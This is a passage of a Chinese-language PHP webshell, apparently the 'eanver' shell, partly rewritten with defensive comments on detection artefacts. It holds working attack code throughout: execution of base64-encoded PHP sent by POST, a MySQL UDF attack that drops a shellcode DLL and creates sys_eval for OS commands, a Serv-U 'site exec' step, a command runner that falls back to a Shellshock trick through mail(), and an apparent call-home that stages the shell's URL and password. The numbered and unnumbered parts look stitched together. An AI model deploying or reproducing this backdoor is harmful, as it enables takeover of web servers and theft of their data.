1142 @fputs($exp, $sendbuf, strlen($sendbuf));
1143 echo "发送数据包: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
1144 $recvbuf = @fgets($exp, 1024);
1145 echo "返回数据包: $recvbuf <br>";
1146 $sendbuf = $deldomain;
1147 @fputs($sock, $sendbuf, strlen($sendbuf));
1148 echo "发送数据包: $sendbuf <br>";
1149 $recvbuf = @fgets($sock, 1024);
1150 echo "返回数据包: $recvbuf <br>";
1151 @fclose($exp);
1152 }
1153 @fclose($sock);
1154 echo '</div>';
1155 }
1156 break;
1157
1158 case "phpcode":
1159 $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
1160 if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode));
1161 echo '<script language="javascript">';
1162 html_base();
1163 echo 'function SubmitUrl(){
1164 document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value);
1165 document.getElementById(\'sendcode\').submit();
1166 }</script><tr><td><form method="POST" id="sendcode" >不用写<? ?>标签,此功能优化使用BASE64加密传送,防止恶意代码被拦,用了就知道(小小细节,注定成就)<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">'.$phpcode.'</textarea><br><br><input type="button" value="执行" onclick="SubmitUrl();" style="width:80px;">';
1167 if(!empty($_POST['phpcode'])){
1168 echo "<br><br>";
1169 eval(stripslashes(base64_decode($_POST['phpcode'])));
1170 }
1171 html_n('</form>');
1172 break;
1173
1174 case "myexp":
1175 $MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
1176 $info = '命令回显';
1177 $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver';
1178 if(isset($_POST['mhost']) && isset($_POST['muser']))
1179 {
1180 @$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
1181 $conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
1182 if($conn)
1183 {
1184 @mysql_select_db($mdata);
1185 /*************************************/
1186 $str=mysql_get_server_info();
1187 //echo 'MYSQL版本:'.$str." ";
1188
1189 if($str[2]>=1){
1190 $sql="SHOW VARIABLES LIKE '%plugin_dir%'";
1191 $row=mysql_query($sql,$conn);
1192 $rows=mysql_fetch_row($row);
1193 $pa=str_replace('\\','/',$rows[1]);
1194 $path=$pa.'/'.$BH;
1195
1196 }else{
1197 $path='C:/WINDOWS/'.$BH;
1198 }
1199 //$mpath=$path;
1200 if(!empty($mpath))
1201 {
1202 $mpath=$mpath;
1203 }else{
1204 $mpath=$path;
1205 }
1206 /*************************************/
1207 if((!empty($_POST['outdll'])) && (!empty($mpath)))
1208 {
1209 $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
1210 if(@mysql_query($query,$conn))
1211 {
1212 $shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode();
1213 $query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
1214 if(@mysql_query($query,$conn))
1215 {
1216 $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
1217 if(@mysql_query($query,$conn))
1218 {
1219 $ap = explode('/', $mpath); $inpath = array_pop($ap);
1220 $query = 'Create Function sys_eval returns string soname \''.$inpath.'\';';
1221 $MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败'.mysql_error();
1222 }
1223 else $MSG_BOX = '导出DLL文件失败'.mysql_error();
1224 }
1225 else $MSG_BOX = '写入临时表失败';
1226 @mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
1227 }
1228 else $MSG_BOX = '创建临时表失败';
1229 }
1230 if(!empty($_POST['runcmd']))
1231 {
1232 $query = 'select sys_eval("'.$sqlcmd.'");';
1233 $result = @mysql_query($query,$conn);
1234 if($result)
1235 {
1236 $k = 0; $info = NULL;
1237 while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
1238 $info = $infotmp;
1239 $MSG_BOX = '执行成功';
1240 }
1241 else $MSG_BOX = '执行失败';
1242 }
1243 }
1244 else $MSG_BOX = '连接MYSQL失败';
1245 }
1246print<<<END
1247<form id="mform" method="POST">
1248<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
1249<center><div class="actall">
1250地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
1251端口 <input type="text" name="mport" value="{$mport}" style="width:110px">
1252用户 <input type="text" name="muser" value="{$muser}" style="width:110px">
1253密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px">
1254库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px">
1255</div><div class="actall">
1256加载路径(自动获取) <input type="text" id='dlllj' name="mpath" value="{$mpath}" style="width:500px">
125764位MYSQL <input type="checkbox" onclick="document.getElementById('dlllj').value='';" name="mysql64" value="1" {$mysql64} />
1258<input type="submit" name="outdll" value="安装DLL" style="width:80px;"></div>
1259<div class="actall">支持高版本MYSQL <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:635px;">
1260<input type="submit" name="runcmd" value="执行" style="width:80px;">
1261<br />
1262<pre>
1263<textarea style="width:720px;height:300px;">{$info}</textarea>
1264</pre>
1265</div></center>
1266</form>
1267END;
1268 break;
1269
1270
1271 case "mysql_exec":
1272 if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
1273 {
1274 if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
1275 {
1276 $cookietime = time() + 24 * 3600;
1277 setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
1278 setcookie('m_eanverport',$_POST['mport'],$cookietime);
1279 setcookie('m_eanveruser',$_POST['muser'],$cookietime);
1280 setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
1281 die('正在登录,请稍候...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');
1282 }
1283 }
1284print<<<END
1285<form method="POST" name="oform" id="oform">
1286<div class="actall">地址 <input type="text" name="mhost" value="localhost" style="width:300px"></div>
1287<div class="actall">端口 <input type="text" name="mport" value="3306" style="width:300px"></div>
1288<div class="actall">用户 <input type="text" name="muser" value="root" style="width:300px"></div>
1289<div class="actall">密码 <input type="text" name="mpass" value="" style="width:300px"></div>
1290<div class="actall"><input type="submit" value="登录" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div>
1291</form>
1292END;
1293break;
1294
1295case "mysql_msg":
1296 $conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
1297 if($conn)
1298 {
1299print<<<END
1300<script language="javascript">
1301function Delok(msg,gourl)
1302{
1303 smsg = "确定要删除[" + unescape(msg) + "]吗?";
1304 if(confirm(smsg)){window.location = gourl;}
1305 window.location = gourl;
1306}
1307function Createok(ac)
1308{
1309 if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
1310 if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
1311 if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
1312 return false;
1313}
1314END;
1315html_base();
1316print<<<END
1317function SubmitUrl(){
1318 document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value);
1319 document.getElementById('gform').submit();
1320}
1321</script>
1322END;
1323 $BOOL = false;
1324 $MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].' 地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' 版本:';
1325 $k = 0;
1326 $result = @mysql_query('select version();',$conn);
1327 while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
1328 echo '<div class="actall"> 数据库:';
1329 $result = mysql_query("SHOW DATABASES",$conn);
1330 while($db = mysql_fetch_array($result)){echo ' [<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
1331 echo '</div>';
1332 if(isset($_GET['db']))
1333 {
1334 mysql_select_db($_GET['db'],$conn);
1335 $_POST['nsql']=base64_decode($_POST['nsql']);
1336 if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '执行成功' : '执行失败 '.mysql_error();}
1337 if(is_array($_POST['insql']))
1338 {
1339 $query = 'INSERT INTO '.$_GET['table'].' (';
1340 foreach($_POST['insql'] as $var => $key)
1341 {
1342 $querya .= $var.',';
1343 $queryb .= '\''.addslashes($key).'\',';
1344 }
1345 $query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
1346 $MSG_BOX = mysql_query($query,$conn) ? '添加成功' : '添加失败 '.mysql_error();
1347 }
1348 if(is_array($_POST['upsql']))
1349 {
1350 $query = 'UPDATE '.$_GET['table'].' SET ';
1351 foreach($_POST['upsql'] as $var => $key)
1352 {
1353 $queryb .= $var.'=\''.addslashes($key).'\',';
1354 }
1355 $query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
1356 $MSG_BOX = mysql_query($query,$conn) ? '修改成功' : '修改失败 '.mysql_error();
1357 }
1358 if(isset($_GET['del']))
1359 {
1360 $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
1361 $good = mysql_fetch_assoc($result);
1362 $query = 'DELETE FROM '.$_GET['table'].' WHERE ';
1363 foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
1364 $where = $query.substr($queryc, 0, -4).';';
1365 $MSG_BOX = mysql_query($where,$conn) ? '删除成功' : '删除失败 '.mysql_error();
1366 }
1367 $action = '?eanver=mysql_msg&db='.$_GET['db'];
1368 if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '删除成功' : '删除失败 '.mysql_error();}
1369 if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
1370 if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
1371 echo '<div class="actall"><form method="POST" action="'.$action.'" name="gform" id="gform">';
1372 echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
1373 echo '<input type="button" name="querysql" value="执行" onclick="SubmitUrl();" style="width:60px;height:49px;">';
1374 echo '<input type="button" value="创建表" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
1375 echo '<input type="button" value="创建库" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
1376 echo '<input type="button" value="删除库" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
1377 echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
1378 if(isset($_GET['table']))
1379 {
1380 echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
1381 echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'">插入</a>]</div>';
1382 if(isset($_GET['edit']))
1383 {
1384 if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
1385 echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">';
1386 $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
1387 $good = mysql_fetch_assoc($result);
1388 $u = 0;
1389 foreach($good as $var => $key)
1390 {
1391 $queryc .= $var.'=\''.$key.'\' AND ';
1392 $type = @mysql_field_type($result, $u);
1393 $len = @mysql_field_len($result, $u);
1394 echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
1395 $u++;
1396 }
1397 $where = 'WHERE '.substr($queryc, 0, -4);
1398 echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
1399 echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
1400 }
1401 else
1402 {
1403 $query = 'SHOW COLUMNS FROM '.$_GET['table'];
1404 $result = mysql_query($query,$conn);
1405 $fields = array();
1406 $pagesize=20;
1407 $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
1408 $numrows=$row_num;
1409 $pages=intval($numrows/$pagesize);
1410 if ($numrows%$pagesize) $pages++;
1411 $offset=$pagesize*($page - 1);
1412 $page=$_GET['p'];
1413 if(!$page) $page=1;
1414
1415 if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
1416 echo '<table border="0"><tr>';
1417 echo '<td class="toptd" style="width:70px;" nowrap>操作</td>';
1418 while($row = @mysql_fetch_assoc($result))
1419 {
1420 array_push($fields,$row['Field']);
1421 echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
1422 }
1423 echo '</tr>';
1424 if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
1425 $result = mysql_query($query,$conn);
1426 $v = $p;
1427 while($text = @mysql_fetch_assoc($result))
1428 {
1429 echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> 修改 </a> ';
1430 echo '<a href="#" onclick="Delok(\'它\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> 删除 </a></td>';
1431 foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
1432 echo '</tr>'."\r\n";$v++;
1433 }
1434 echo '</table><div class="actall">';
1435 $pagep=$page-1;
1436 $pagen=$page+1;
1437 echo "共有 ".$row_num." 条记录 ";
1438 if($pagep>0) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'>首页</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'>上一页</a> "; else $pagenav.=" 上一页 ";
1439 if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'>下一页</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'>尾页</a>"; else $pagenav.=" 下一页 ";
1440 $pagenav.=" 第 [".$page."/".$pages."] 页 跳到<input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />页";
1441 echo $pagenav;
1442 echo '</div>';
1443 }
1444 }
1445 elseif(isset($_GET['insert']))
1446 {
1447 echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
1448 $result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
1449 $fieldnum = @mysql_num_fields($result);
1450 echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
1451 for($i = 0;$i < $fieldnum;$i++)
1452 {
1453 $name = @mysql_field_name($result, $i);
1454 $type = @mysql_field_type($result, $i);
1455 $len = @mysql_field_len($result, $i);
1456 echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
1457 }
1458 echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
1459 }
1460 else
1461 {
1462 $query = 'SHOW TABLE STATUS';
1463 $status = @mysql_query($query,$conn);
1464 while($statu = @mysql_fetch_array($status))
1465 {
1466 $statusize[] = $statu['Data_length'];
1467 $statucoll[] = $statu['Collation'];
1468 }
1469 $query = 'SHOW TABLES FROM '.$_GET['db'].';';
1470 echo '</div><table border="0"><tr>';
1471 echo '<td class="toptd" style="width:550px;"> 表名 </td>';
1472 echo '<td class="toptd" style="width:80px;"> 操作 </td>';
1473 echo '<td class="toptd" style="width:130px;"> 字符集 </td>';
1474 echo '<td class="toptd" style="width:70px;"> 大小 </td></tr>';
1475 $result = @mysql_query($query,$conn);
1476 $k = 0;
1477 while($table = mysql_fetch_row($result))
1478 {
1479 $charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
1480 echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
1481 echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"> 插入 </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> 删除 </a></td>';
1482 echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
1483 $k++;
1484 }
1485 echo '</table>';
1486 }
1487 }
1488 }
1489 else die('连接MYSQL失败,请重新登录.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
1490 if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
1491break;
1492
1493
1494 default: html_main($path,$shellname); break;
1495}
css_foot(); // page footer, reached by every branch of the dispatch switch above that did not exit/die
1497
1498/*---doing---*/
1499
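function do_write($file,$t,$text)
{
    // Write $text to $file using fopen() mode $t ("ab"/"wb" at the call sites in
    // this file). Returns true on success, false when the file cannot be opened or
    // written. On a failed first write the file is chmod'ed to 0666 and the write
    // retried once, mirroring the original fallback.
    $handle = @fopen($file, $t);
    if ($handle === false) {
        // The original went on to fwrite()/fclose() a false handle here.
        return false;
    }
    // fwrite() returns the byte count, so an empty $text is a successful write of
    // zero bytes; only a false return is a failure.
    $ok = @fwrite($handle, $text) !== false;
    if (!$ok) {
        @chmod($file, 0666);
        $ok = @fwrite($handle, $text) !== false;
    }
    @fclose($handle);
    return $ok;
}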
1512
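function do_show($filepath){
    // List the entries of directory $filepath (excluding "." and "..") as full
    // paths normalised through str_path(). Returns an empty array when the
    // directory cannot be opened (the original dereferenced a false handle).
    $show = array();
    $dir = @dir($filepath);
    if ($dir === false) return $show;
    // Compare against false explicitly so an entry literally named "0" does not
    // terminate the listing early.
    while (($file = $dir->read()) !== false) {
        if ($file == '.' or $file == '..') continue;
        $show[] = str_path($filepath.'/'.$file);
    }
    $dir->close();
    return $show;
}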
1524
function do_deltree($deldir){
    // Recursively remove directory $deldir: each entry from do_show() is unlinked
    // (files) or removed through a recursive call (directories), then $deldir
    // itself is rmdir'ed. Returns false at the first removal that fails.
    foreach (do_show($deldir) as $entry) {
        if (is_dir($entry)) {
            if (!do_deltree($entry)) return false;
            continue;
        }
        @chmod($entry, 0777);
        if (!@unlink($entry)) return false;
    }
    @chmod($deldir, 0777);
    return (bool)@rmdir($deldir);
}
1539
function do_showsql($query,$conn){
    // Run $query on the legacy mysql_* link $conn and dump every column of every
    // row into a <textarea>, one html_n() call per value. The mysql_* extension
    // was removed in PHP 7, so this path only works on PHP 5.
    $result = @mysql_query($query, $conn);
    html_n('<br><br><textarea cols="70" rows="15">');
    while (($row = @mysql_fetch_array($result)) !== false) {
        $cols = @mysql_num_fields($result);
        for ($i = 0; $i < $cols; $i++) {
            html_n(htmlspecialchars($row[$i]));
        }
    }
    html_n('</textarea>');
}
1550
function hmlogin($xiao=1){
// Runs right after a successful password check (and on the eval path in the
// preamble). Builds this script's URL from HTTP_HOST + PHP_SELF and, unless the
// host looks local ("0.0", "192.168." or "localhost" found at an offset > 0 —
// strpos()>0 misses a match at offset 0, so a bare "localhost" host does not
// count) or the serveru/serverp cookies already carry the same URL and password,
// stores both in those cookies and then either emits <script src='?login=geturl'>
// ($xiao == 1) or calls geturl() directly. geturl() is defined outside this chunk;
// since the values staged for it are the shell's own URL and password, this looks
// like a call-home, and the "?login=geturl" request plus the serveru/serverp
// cookies are the artefacts to alert on.
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = postpass;
if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}}
}
1556
function do_down($fd){
    // Stream the file at $fd to the client as an attachment and exit. A missing
    // file is reported through msg(), which die()s with a JS alert.
    if (!@file_exists($fd)) msg('下载文件不存在');
    $info = pathinfo($fd);
    $headers = array(
        'Content-type: application/x-' . $info['extension'],
        'Content-Disposition: attachment; filename=' . $info['basename'],
        'Content-Length: ' . filesize($fd),
    );
    foreach ($headers as $h) header($h);
    @readfile($fd);
    exit;
}
1566
function do_download($filecode,$file){
    // Send the in-memory bytes $filecode to the client as attachment $file and exit.
    $headers = array(
        "Content-type: application/unknown",
        'Accept-Ranges: bytes',
        "Content-length: " . strlen($filecode),
        "Content-disposition: attachment; filename=" . $file . ";",
    );
    foreach ($headers as $h) header($h);
    echo $filecode;
    exit;
}
1575
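function TestUtf8($text)
{
    // Classify the encoding of $text with a byte-level heuristic:
    //   false - shorter than three bytes, nothing to decide on
    //   2     - UTF-8 (leading BOM, or continuation bytes mostly follow lead bytes)
    //   1     - pure 7-bit ASCII
    //   0     - non-ASCII bytes that do not look like UTF-8 (e.g. GBK)
    // The original never detected the BOM ($begin stopped at 3 while the check
    // wanted 4) and dropped the first three bytes from the heuristic even when
    // they were not a BOM; both are fixed here.
    $len = strlen($text);
    if ($len < 3) return false;
    if (substr($text, 0, 3) === "\xEF\xBB\xBF") return 2;

    $lastch = 0;
    $good = 0;      // continuation byte directly after a lead byte
    $bad = 0;       // continuation byte after ASCII, or lead byte with no continuation
    $notAscii = 0;
    for ($i = 0; $i < $len; $i++) {
        $ch = ord($text[$i]);
        if ($ch >= 0x80) $notAscii++;
        if (($ch & 0xC0) == 0x80) {
            if (($lastch & 0xC0) == 0xC0) $good++;
            elseif (($lastch & 0x80) == 0) $bad++;
        } elseif (($lastch & 0xC0) == 0xC0) {
            $bad++;
        }
        $lastch = $ch;
    }
    if ($notAscii == 0) return 1;
    return ($good >= $bad) ? 2 : 0;
}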
1609
function File_Str($string)
{
    // Normalise path separators: backslashes become "/", then "//" collapses to "/"
    // in a single pass (so "///" becomes "//").
    $forward = strtr($string, '\\', '/');
    return str_replace('//', '/', $forward);
}
1614
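function File_Write($filename,$filecode,$filemode)
{
    // Write $filecode to $filename using fopen() mode $filemode. Returns true on
    // success, false when the file cannot be opened or written. A failed first
    // write is retried once after chmod 0666, as in the original.
    $handle = @fopen($filename, $filemode);
    if ($handle === false) {
        // The original went on to fwrite()/fclose() a false handle here.
        return false;
    }
    // fwrite() returns the byte count; writing an empty string returns 0 and is
    // not a failure — only false is.
    $ok = @fwrite($handle, $filecode) !== false;
    if (!$ok) {
        @chmod($filename, 0666);
        $ok = @fwrite($handle, $filecode) !== false;
    }
    @fclose($handle);
    return $ok;
}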
1627
function Exec_Run($cmd)
{
 // Runs an OS command through whichever execution primitive the host still
 // exposes, trying exec/shell_exec/system/passthru/popen, then WScript.Shell via
 // COM on Windows, then proc_open, and finally a Shellshock-style trick through
 // mail(). Everything is "@"-suppressed, so nothing reaches the PHP error log;
 // each branch is its own detection point (disable_functions coverage for the
 // first five, COM object creation on Windows, a sendmail child of php carrying a
 // "PHP_LOL=() {" environment variable for the last one).
 $res = '';
 if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
 elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
 elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
 elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
 elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
 elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}
 // proc_open branch: $aliases is never defined in this function, so the alias
 // substitution is dead code; unlike the other branches, stdout/stderr are
 // HTML-escaped here.
 elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}
 // mail() branch: command output is collected in a temp file created beside the
 // script (tempnam(".","data")) and deleted afterwards — a short-lived "data*"
 // file in the web root is an artefact worth catching. $tmp is undefined on the
 // "not bash" path, so file_get_contents(null) runs there.
 elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}
 return $res;
}
1641
function File_Mode()
{
    // Derive the document root by trimming the script's URL directory off the
    // end of the real working directory, normalised through File_Str().
    $realPath = realpath('./');
    $urlDir = $_SERVER['PHP_SELF'];
    $urlDir = substr($urlDir, 0, strrpos($urlDir, '/'));
    $rootLen = strlen($realPath) - strlen($urlDir);
    return File_Str(substr($realPath, 0, $rootLen));
}
1649
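function GetFileOwner($File) {
    // Owner name of $File on POSIX hosts (PATH_SEPARATOR ":"), or null when the
    // posix extension is missing, the file cannot be stat'ed, or on Windows.
    // The original indexed the path string with ['name'] when posix_getpwuid()
    // was unavailable, and passed a false fileowner() result straight through.
    if (PATH_SEPARATOR != ':') return null;
    if (!function_exists('posix_getpwuid')) return null;
    $uid = @fileowner($File);
    if ($uid === false) return null;
    $pw = @posix_getpwuid($uid);
    return is_array($pw) ? $pw['name'] : null;
}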
1658
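function GetFileGroup($File) {
    // Group name of $File on POSIX hosts (PATH_SEPARATOR ":"), or null when the
    // posix extension is missing, the file cannot be stat'ed, or on Windows.
    // The original indexed the path string with ['name'] when posix_getgrgid()
    // was unavailable, and passed a false filegroup() result straight through.
    if (PATH_SEPARATOR != ':') return null;
    if (!function_exists('posix_getgrgid')) return null;
    $gid = @filegroup($File);
    if ($gid === false) return null;
    $gr = @posix_getgrgid($gid);
    return is_array($gr) ? $gr['name'] : null;
}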
1667
function File_Size($size)
{
    // Human-readable byte count: plain bytes below 1 K, otherwise the value
    // divided by the largest fitting power of 1024 (K, M, G, T) rounded to two
    // decimals; anything at or above 1 T is expressed in T.
    $divisor = 1;
    $unit = 'B';
    foreach (array('K', 'M', 'G', 'T') as $next) {
        if ($size < $divisor * 1024) break;
        $divisor *= 1024;
        $unit = $next;
    }
    if ($unit === 'B') return $size . " B";
    return round($size / $divisor, 2) . " " . $unit;
}
1695
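function File_Read($filename)
{
    // Read the whole of $filename as binary. Returns '' when the file cannot be
    // read. The original called fread() with filesize() as the length, which
    // throws on an empty file under PHP 8 and dereferenced a false handle on a
    // missing one.
    $filecode = @file_get_contents($filename);
    return $filecode === false ? '' : $filecode;
}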
1703
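function array_iconv($data, $output = 'utf-8') {
    // Convert a string — or every string key and value of a (nested) array — to
    // $output, detecting each string's source encoding from a fixed candidate
    // list. Non-string scalars are returned unchanged. The original passed the
    // whole array to mb_detect_encoding(), converted $data instead of $val for
    // scalar elements, and wrote converted keys next to the old ones.
    static $candidates = array('UTF-8','ASCII','GBK','GB2312','BIG5','JIS','eucjp-win','sjis-win','EUC-JP');
    if (is_array($data)) {
        $out = array();
        foreach ($data as $key => $val) {
            // Only string keys carry an encoding; the array is rebuilt so a
            // converted key replaces the original rather than sitting beside it.
            $newKey = is_string($key) ? array_iconv($key, $output) : $key;
            $out[$newKey] = array_iconv($val, $output);
        }
        return $out;
    }
    if (!is_string($data)) return $data;
    $from = mb_detect_encoding($data, $candidates);
    if ($from === false) return $data;  // undetectable: pass through rather than mangle
    return mb_convert_encoding($data, $output, $from);
}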
1723
function Info_Cfg($varname){
    // Report a php.ini value as "Yes"/"No" when it loosely equals 1/0 (so false,
    // "0" and "1" are covered, as with the original switch), else the raw value.
    $result = get_cfg_var($varname);
    if ($result == 0) return "No";
    if ($result == 1) return "Yes";
    return $result;
}
function Info_Fun($funName){
    // "Yes" when $funName names a defined function, otherwise "No".
    return function_exists($funName) ? "Yes" : "No";
}
1726
